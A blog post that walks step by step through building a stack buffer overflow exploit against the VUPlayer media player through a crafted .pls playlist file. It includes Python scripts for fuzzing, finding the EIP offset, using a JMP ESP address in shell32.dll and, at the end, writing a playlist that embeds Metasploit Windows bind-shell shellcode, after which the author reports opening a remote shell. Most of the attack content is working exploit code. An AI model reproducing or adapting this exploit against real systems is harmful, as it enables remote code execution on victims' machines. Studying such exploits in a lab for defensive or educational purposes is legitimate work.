Tuesday, 14 February 2012

Buffer Overflow Exploits - VUPlayer

this article is,, what all i do when  try to exploits VUPlayer,, first install VUPlayer in  virtual box, after finished install, i open VUPlayer to know about VUPlayer




then i try to know about VUPlayer, what file can open by VUPlayer


 from thats image i know if VUPlayer can load a playlist file with extension .m3u, . pls, .vpl, .wax, .cue. from that information i want try to attacks VUPlayer through input playlist file. first i try VUplayer to open playlist file that contains charackter 'A'  some 10000, to make that playlist file i use python

#! /usr/bin/python
filename="hajar.pls"
hancur='\x41' * 10000
file=open(filename,'w')
file.write(hancur)
print("tercetak")
file.close()

that command using to create playlist file 'hajar.pls' but we must compile before. after that, i open VUplayer and open playlist file has created



and what happend??? VUplayer closed nd may be this application has  got buffer overflow. to make sure what happened with VUplayer  i check run VUplayer through Ollydbg then i open palylist files hat contains charackter 'A'  some 10000  this result like this :

then i open palylist files hat contains charackter 'A'  some 10000  this result like this :


this result showing that EIP and ESP register overwrite overwriten by 'A' Character, then to find addres position of string has overwrite EIP and ESP register, i try to make structured string character using pattern_create from metasploits




then thats structured string i input into a playlist file using python


#! /usr/bin/python
filename="hajar.pls"
hancur='Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac
0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae
3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7
Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2A
j3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9
Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao
1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3A
q4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As
8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av
3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax
6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0
Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3
........................'
file=open(filename,'w')
file.write(hancur)
print("tercetak")
file.close()

then compile and open thats playlist file using VUplayer through ollydbg

ollydbg showing that EIP and ESP overwriten with character string from playlist file, to  know this postion of string that overwrite EIP register, i use pattern offset to find that address :
that pattern offset showing string that overwrite EIP in number 1012 and ESP in 1016.
to make sure that number is position of EIP addres, make playlist file 
 
#! /usr/bin/python
filename="hajar.pls"
hancur='\x90' * 1012
hancur+='\xAA\xBB\xCC\xDD'
file=open(filename,'w')
file.write(hancur)
print("tercetak")
file.close()

then compile and open that playlist file using VUplayer through ollydbg 

 ollydbg showing that EIP register is overwriten by 'DDCCBBAA' which has set on playlist file. so that number address of EIP its true. then i try to overwriten stack, if stack can be overwriten so that stack can be include payload. make playlist file using python with command

#! /usr/bin/python
filename="hajar.pls"
hancur='\x90' * 1012
hancur+='\xAA\xBB\xCC\xDD'
hancur+='\x90' * (1016 - len(hancur))
hancur+='\CC' * (2000 - len(hancur))
file=open(filename,'w')
file.write(hancur)
print("tercetak")
file.close()

then compile and open that playlist file using VUplayer through ollydbg 

ollydbg showing that stack overwriten.

Because EIP register can't direct access into  buffer-memory, i use JMP ESP command to direct EIP register to access payload in stack. open menu view -> executables module then search choose shell32.dll, then search JMP-ESP with right mouse click -> search for ->command

i found JMP ESP is 7C9D30D7.

then make payload using metasploits framework,

on filter choose win 32, and then choose windows bind shell
 then input set like below :

 press generated payload :


 then make playlist file with include JMP ESP addres and payload using python

#! /usr/bin/python
filename="hajarlah.pls"
hancur='\x90' * 1012
hancur+='\xD7\x30\x9D\x7C'
hancur+='\x90' * 16
hancur+=("\x33\xc9\xdb\xd4\xba\xaf\x6f\x52\x6f\xb1\x51\xd9\x74\x24\xf4\x5b"
"\x31\x53\x15\x03\x53\x15\x83\x6c\x6b\xb0\x9a\x8e\x1e\xdf\x28\x86"
"\x26\xe0\x4c\xa9\xb9\x94\xdf\x71\x1e\x20\x5a\x45\xd5\x4a\x60\xcd"
"\xe8\x5d\xe1\x62\xf3\x2a\xa9\x5c\x02\xc6\x1f\x17\x30\x93\xa1\xc9"
"\x08\x63\x38\xb9\xef\xa3\x4f\xc6\x2e\xe9\xbd\xc9\x72\x05\x49\xf2"
"\x26\xfe\x9a\x71\x22\x75\x85\x5d\xad\x61\x5c\x16\xa1\x3e\x2a\x77"
"\xa6\xc1\xc7\x84\xfa\x4a\x9e\xe6\x26\x51\xc0\x35\x17\xb2\x66\x32"
"\x1b\x74\xec\x04\x90\xff\x82\x98\x05\x74\x22\xa8\x0b\xe3\x2d\xe6"
"\xbd\x1f\x61\x09\x17\xb9\xd1\x93\xf0\x75\xe4\x33\x76\x09\x3a\x9c"
"\x2c\x12\xea\x4a\x06\x01\xf7\xb1\xc8\x25\xde\x9a\x61\x3c\xb9\xa5"
"\x9f\xb7\x44\xf0\x35\xca\xb7\x2a\xa1\x13\x4e\x3f\x9f\xf3\xae\x69"
"\xb3\xa8\x03\xc6\x67\x0c\xf7\xab\xd4\x6d\x27\x4d\xb3\x84\x7b\xf7"
"\x10\x2e\x9a\x62\xfe\x94\x47\xfc\x38\x83\x88\x2a\xac\x3c\x26\x87"
"\xce\xed\xa0\x83\x9c\x20\xd8\x9c\x21\xea\x49\x77\x21\xc3\x06\x92"
"\x94\x62\x9f\x0b\xd8\xbd\x70\xe7\x72\x17\x8e\xd7\xe8\xff\x97\xae"
"\xc8\x79\x0f\xaf\x03\x2c\x50\x9f\xca\xa5\xca\x79\x7b\x59\x7e\x0c"
"\x9e\xf7\xd0\x57\x48\xc4\x58\x80\xe0\x90\xd3\xac\xc4\xd8\x17\x9a"
"\xd9\x9b\xfa\x24\x67\x30\x96\x55\x12\x70\x33\xce\x48\xe8\x31\xee"
"\x3c\xff\x4a\x7b\x07\xff\x63\xd8\xd0\xad\xda\x8f\x8f\x3b\xdc\x7e"
"\x61\xe9\x8f\x7f\x51\x79\x9d\xa6\x57\xb4\x8e\xa7\x8e\x22\xce\xa8"
"\x18\x4c\xe0\xdd\x30\x4e\x82\x25\xda\x51\x53\xf7\xdc\x7e\x34\x89"
"\xfa\x9d\xb6\x26\x04\xb7\xc6\x18")
file=open(filename,'w')
file.write(hancur)
print("tercetak")
file.close()

then compile and open that playlist file using VUplayer

that VUplayer crash / error, then i open my terminal console from bactrack and i try to open connection using telnet
 

and i succes to open windows dirctory from bactrack
finished,,,,

No comments:

Post a Comment